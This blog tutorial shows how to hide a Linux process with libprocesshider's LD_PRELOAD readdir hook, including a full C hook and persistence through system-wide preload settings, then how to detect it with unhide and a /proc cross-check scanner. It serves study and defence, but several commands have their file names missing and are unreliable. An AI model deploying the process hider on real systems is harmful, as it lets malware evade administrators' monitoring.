Creating and discovering hidden processes on CentOS 7 Linux

1, Hiding a process

1. The tool used in this article is libprocesshider, which can be downloaded from GitHub.

2. The idea is to hijack a C library function (here readdir) by means of LD_PRELOAD.

LD_PRELOAD is an environment variable that makes the dynamic linker load the listed shared libraries before every other library, so their symbols take precedence over same-named symbols anywhere else. The search order is roughly LD_PRELOAD > LD_LIBRARY_PATH > /etc/ > /lib > /usr/lib. Programs constantly call functions from external libraries; take malloc as an example: if we write our own malloc, compile it into a shared library and load it through LD_PRELOAD, then every call to malloc in the program lands in our function instead of the libc one. Two limits are worth knowing before relying on this: the loader ignores LD_PRELOAD for set-user-ID and set-group-ID executables (secure-execution mode, where only libraries in the standard search directories and with the set-user-ID bit are preloaded), and statically linked programs never consult the dynamic linker at all, so they are unaffected.


[root@kangcw ~]# git clone
Cloning into 'libprocesshider'...
remote: Enumerating objects: 30, done.
remote: Total 30 (delta 0), reused 0 (delta 0), pack-reused 30
Unpacking objects: 100% (30/30), done.

[root@kangcw ~]# cd libprocesshider/
[root@kangcw libprocesshider]# ls
Makefile  processhider.c

# Edit processhider.c and set the name of the process to hide
[root@kangcw libprocesshider]# vim processhider.c  # open the file
static const char* process_to_filter = "xianyu_cb";    ## the process name (the kernel's comm field) that will be filtered out

[root@kangcw libprocesshider]# make
gcc -Wall -fPIC -shared -o processhider.c -ldl

// Move the compiled library to /usr/local/lib/
[root@kangcw libprocesshider]# mv /usr/local/lib/

// Register it in the dynamic linker's global preload list, so that every dynamically linked program loads it

echo /usr/local/lib/ >> /etc/

// Or set it in /etc/profile (affects login shells and the programs they start)
[root@kangcw libprocesshider]# cat /etc/profile |tail -n 1
export LD_PRELOAD=/usr/local/lib/


Before loading the library
// Start the process that is to be hidden
[root@kangcw libprocesshider]# ./xianyu_cb cb &
[1] 17131
[root@kangcw libprocesshider]# Waiting for the server to connect...
[root@kangcw libprocesshider]# ps -ef |grep xianyu
root     17131 17041  0 20:36 pts/2    00:00:00 ./xianyu_cb cb  # the process is visible
root     17149 17041  0 20:36 pts/2    00:00:00 grep --color=auto xianyu

// After enabling the preload: edit /etc/profile, then source it so the current shell, and every program it starts (including ps), picks up LD_PRELOAD
[root@kangcw libprocesshider]# vim /etc/profile
[root@kangcw libprocesshider]# source /etc/profile
[root@kangcw libprocesshider]# ./xianyu_cb cb&
[1] 17731
[root@kangcw libprocesshider]# Waiting for the server to connect...
[root@kangcw libprocesshider]# ps -ef|grep xianyu     # the process is now hidden from ps
root     17749 17411  0 20:38 pts/2    00:00:00 grep --color=auto xianyu
[root@kangcw libprocesshider]# 


  1. The program defines a variable process_to_filter that controls which process name is not displayed.
  2. It overrides readdir. For every entry read from /proc it looks up the process name and tests
    strcmp(process_name, process_to_filter) == 0
    When the name of the current entry equals process_to_filter the loop continues with the next entry, so the caller (ps, top, ls /proc) never receives it.
  1. The program fails to compile on some Linux distributions. Delete one of the last two lines:


    DECLARE_READDIR(dirent64, readdir64);

    DECLARE_READDIR(dirent, readdir);

    The two lines define hooks for readdir64 and readdir; a C library that treats the two as one function rejects the second definition. Be aware that a program built with large-file support calls readdir64, so if only the readdir hook is kept, such a program will still list the process.
  2. On some Linux systems

    echo /usr/local/lib/ >> /etc/

    does not work. In that case set the environment variable instead:

    bmfxgkpt-yhd:~# vi /etc/profile

    and add a line

    export LD_PRELOAD=/usr/local/lib/

    Note that /etc/profile is read only by login shells, so the variable reaches the programs started from such a shell (and the current shell only after source /etc/profile); services started by init are not affected, whereas the global preload list is honoured by every dynamically linked program.
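The mechanism described above (LD_PRELOAD interposition of readdir, with process_to_filter deciding which /proc entry is dropped) spelled out as a complete, added example. This is code written for this page, not the libprocesshider source: it interposes readdir, forwards to libc's readdir through dlsym(RTLD_NEXT, ...), and skips /proc entries whose comm matches. The helpers set_hidden_process_name, read_comm, should_hide_entry and proc_lists_pid, the file name hide_by_name.c/.so and the build line in the header comment are all assumptions of this example.

```c
/* hide_by_name.c: added example of the libprocesshider technique (not its
 * source). Every readdir() on /proc skips entries whose comm matches
 * process_to_filter. Build and use (file names assumed):
 *   gcc -Wall -fPIC -shared -o hide_by_name.so hide_by_name.c -ldl
 *   LD_PRELOAD=./hide_by_name.so ps -ef
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef RTLD_NEXT              /* glibc/musl value, in case the header hid it */
#define RTLD_NEXT ((void *)-1l)
#endif
#pragma weak dlsym             /* lets a self-test link without -ldl on glibc < 2.34 */

/* Name to hide, compared with the kernel's comm field. comm holds at most
 * 15 characters, so a longer name here can never match anything. */
static char process_to_filter[16] = "xianyu_cb";

void set_hidden_process_name(const char *name) {
    snprintf(process_to_filter, sizeof process_to_filter, "%s", name);
}

/* Read /proc/<pid>/comm into buf (same text as the (comm) field of
 * /proc/<pid>/stat that libprocesshider parses). Returns 0 on success. */
int read_comm(pid_t pid, char *buf, size_t len) {
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/comm", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    int ok = fgets(buf, (int)len, f) != NULL;
    fclose(f);
    if (!ok) return -1;
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}

/* Is dirp an open handle on /proc itself? Resolve its fd via /proc/self/fd. */
static int dir_is_proc(DIR *dirp) {
    char link[64], target[256];
    snprintf(link, sizeof link, "/proc/self/fd/%d", dirfd(dirp));
    ssize_t n = readlink(link, target, sizeof target - 1);
    if (n < 0) return 0;
    target[n] = '\0';
    return strcmp(target, "/proc") == 0;
}

/* Suppress only numeric /proc entries whose comm equals process_to_filter. */
int should_hide_entry(DIR *dirp, const char *name) {
    char comm[32];
    if (name[0] < '0' || name[0] > '9' || !dir_is_proc(dirp)) return 0;
    if (read_comm((pid_t)atoi(name), comm, sizeof comm) != 0) return 0;
    return strcmp(comm, process_to_filter) == 0;
}

/* The interposed readdir(): call the real one (the next object after us in
 * the search order, i.e. libc) and skip matching entries. libprocesshider
 * interposes readdir64 the same way; programs built with large-file
 * support call that symbol instead of this one. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *);
    if (!real_readdir) {
        if (!dlsym) return NULL;              /* no dlsym: behave as an empty dir */
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
        if (!real_readdir) return NULL;
    }
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL && should_hide_entry(dirp, e->d_name))
        ;                                      /* drop it and read the next one */
    return e;
}

/* What a program walking /proc with readdir() sees: 1 if pid is listed,
 * 0 if not, -1 if /proc cannot be opened. */
int proc_lists_pid(pid_t pid) {
    char want[32];
    int found = 0;
    snprintf(want, sizeof want, "%d", (int)pid);
    DIR *d = opendir("/proc");
    if (!d) return -1;
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, want) == 0) { found = 1; break; }
    closedir(d);
    return found;
}
```

Three things to keep in mind when using this for real: hook readdir64 as well (as libprocesshider does), since a program built with large-file support never calls readdir; the name is matched against comm, which the kernel truncates to 15 characters; and anything that does not go through the dynamic linker's readdir (a statically linked binary, or a program that calls getdents64 directly) still sees the process, which is exactly what the detection in the next section relies on.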

2, Discovering hidden processes

unhide is a small forensic tool that finds processes and TCP/UDP ports hidden by rootkits, LKMs or other techniques. It runs on Linux, other Unix-like systems and MS-Windows. Its approach is to compare several views of the process list that a single hook cannot all falsify at once: for example the proc test cross-checks PIDs found under /proc against the output of ps, and the brute test probes every possible PID directly instead of trusting a directory listing.


[root@kangcw ~]# yum install unhide
Loaded plugins: fastestmirror, langpacks, priorities
Repository epel is listed more than once in the configuration
Loading mirror speeds from cached hostfile
 * centos-sclo-rh:
 * centos-sclo-sclo:
 * remi-safe:
centos-sclo-rh                                                                                                                                                        | 3.0 kB  00:00:00     
centos-sclo-sclo                                                                                                                                                      | 2.9 kB  00:00:00     
epel                                                                                                                                                                  | 5.3 kB  00:00:00     
extras                                                                                                                                                                | 2.9 kB  00:00:00     
google-chrome                                                                                                                                                         | 1.3 kB  00:00:00     
mysql-connectors-community                                                                                                                                            | 2.5 kB  00:00:00     
mysql-tools-community                                                                                                                                                 | 2.5 kB  00:00:00     
mysql57-community                                                                                                                                                     | 2.5 kB  00:00:00     
os                                                                                                                                                                    | 3.6 kB  00:00:00     
remi-safe                                                                                                                                                             | 3.0 kB  00:00:00     
teamviewer                                                                                                                                                            | 2.5 kB  00:00:00     
updates                                                                                                                                                               | 2.9 kB  00:00:00     
remi-safe/primary_db                                                                                                                                                  | 1.7 MB  00:02:53     
Resolving Dependencies
--> Running transaction check
---> Package unhide.x86_64 0:20130526-1.el7 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

 Package                                     Arch                                        Version                                             Repository                                 Size
 unhide                                      x86_64                                      20130526-1.el7                                      epel                                       63 k

Transaction Summary
Install  1 Package

Total download size: 63 k
Installed size: 146 k
Is this ok [y/d/N]: y
Downloading packages:
unhide-20130526-1.el7.x86_64.rpm                                                                                                                                      |  63 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : unhide-20130526-1.el7.x86_64                                                                                                                                              1/1 
  Verifying  : unhide-20130526-1.el7.x86_64                                                                                                                                              1/1 

  unhide.x86_64 0:20130526-1.el7                                                                                                                                                             



Use unhide proc to discover the hidden process, as shown in the figure below. Because the LD_PRELOAD hook only filters what readdir returns, the /proc/<pid> directory of the hidden process still exists and is still reachable by name, so a check that probes PIDs directly and compares with ps finds it.
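The cross-check behind that detection, as an added example written for this page (it is not unhide's source and not part of the original article). It takes the readdir() view of /proc, which is the call the LD_PRELOAD hook filters, and compares it with a per-PID probe through stat() and kill(), which never touches a directory listing. Thread IDs are excluded through the Tgid field of /proc/<pid>/status (they are also absent from the /proc listing but are not hidden processes), and every candidate is re-confirmed against a fresh listing so a process that merely started during the scan is not reported. The names find_hidden_pids, pid_exists_direct, is_thread and read_pid_max, and the g_simulate_hidden_pid switch used for self-testing, are assumptions of this example.

```c
/* hidden_pid_scan.c: added example of the /proc cross-check that finds
 * processes an LD_PRELOAD readdir() hook hides. Not unhide's code.
 * Build: gcc -Wall -o hidden_pid_scan hidden_pid_scan.c   (file name assumed) */
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Self-test aid only: this PID is dropped from the readdir() view so a hidden
 * process can be simulated without installing the hook. 0 = off. */
pid_t g_simulate_hidden_pid = 0;

/* Largest PID the kernel hands out; falls back to 32768 if unreadable. */
pid_t read_pid_max(void) {
    long v = 32768;
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%ld", &v) != 1) v = 32768; fclose(f); }
    return (pid_t)v;
}

/* View 1: what readdir() on /proc reports, the call the hook filters.
 * Sets one bit per numeric entry in the bitmap. */
static int list_proc_readdir(unsigned char *seen, pid_t max_pid) {
    DIR *d = opendir("/proc");
    if (!d) return -1;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char *end;
        long pid = strtol(e->d_name, &end, 10);
        if (*end != '\0' || pid <= 0 || pid > max_pid) continue;
        if ((pid_t)pid == g_simulate_hidden_pid) continue;
        seen[pid / 8] |= (unsigned char)(1u << (pid % 8));
    }
    closedir(d);
    return 0;
}

/* View 2: does the kernel know this PID, asked without any directory
 * listing? stat() of /proc/<pid> and kill(pid, 0) both bypass readdir(). */
int pid_exists_direct(pid_t pid) {
    char path[64];
    struct stat st;
    snprintf(path, sizeof path, "/proc/%d", (int)pid);
    if (stat(path, &st) == 0) return 1;
    if (kill(pid, 0) == 0) return 1;
    return errno == EPERM;          /* exists but belongs to another user */
}

/* Threads are not listed by readdir() on /proc either; a TID whose Tgid
 * differs from itself is a thread, not a hidden process. */
int is_thread(pid_t pid) {
    char path[64], line[128];
    long tgid = -1;
    snprintf(path, sizeof path, "/proc/%d/status", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    while (fgets(line, sizeof line, f))
        if (sscanf(line, "Tgid: %ld", &tgid) == 1) break;
    fclose(f);
    return tgid > 0 && (pid_t)tgid != pid;
}

/* Scan 1..max_pid and report PIDs that exist directly but are missing from
 * the readdir() view. Each candidate is re-checked against a fresh listing
 * and a second direct probe to drop processes that started or exited
 * while the scan was running. Returns the number of PIDs written to out. */
size_t find_hidden_pids(pid_t max_pid, pid_t *out, size_t cap) {
    size_t n = 0, bytes = (size_t)max_pid / 8 + 1;
    unsigned char *seen = calloc(bytes, 1);
    if (!seen || list_proc_readdir(seen, max_pid) != 0) { free(seen); return 0; }
    for (pid_t pid = 1; pid <= max_pid && n < cap; pid++) {
        if (seen[pid / 8] & (1u << (pid % 8))) continue;      /* listed: fine */
        if (!pid_exists_direct(pid) || is_thread(pid)) continue;
        memset(seen, 0, bytes);                               /* confirm */
        if (list_proc_readdir(seen, max_pid) != 0) break;
        if (seen[pid / 8] & (1u << (pid % 8))) continue;      /* a late starter */
        if (pid_exists_direct(pid)) out[n++] = pid;
    }
    free(seen);
    return n;
}

int main(void) {
    pid_t hidden[256];
    size_t n = find_hidden_pids(read_pid_max(), hidden, 256);
    for (size_t i = 0; i < n; i++)
        printf("hidden pid %d (absent from readdir, present via stat/kill)\n", (int)hidden[i]);
    printf("%zu hidden process(es) found\n", n);
    return 0;
}
```

Run it from a shell where LD_PRELOAD points at the hider and the hidden xianyu_cb PID is reported even though ps omits it: the scanner itself loads the hook and gets the filtered readdir() view, but stat() and kill() still answer for the PID. A hook that also interposes stat and kill would defeat this particular cross-check, which is why unhide combines several independent views rather than one.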

Tags: Operation & Maintenance CentOS Linux EPEL github

Posted on Mon, 23 Mar 2020 10:13:26 -0400 by dickey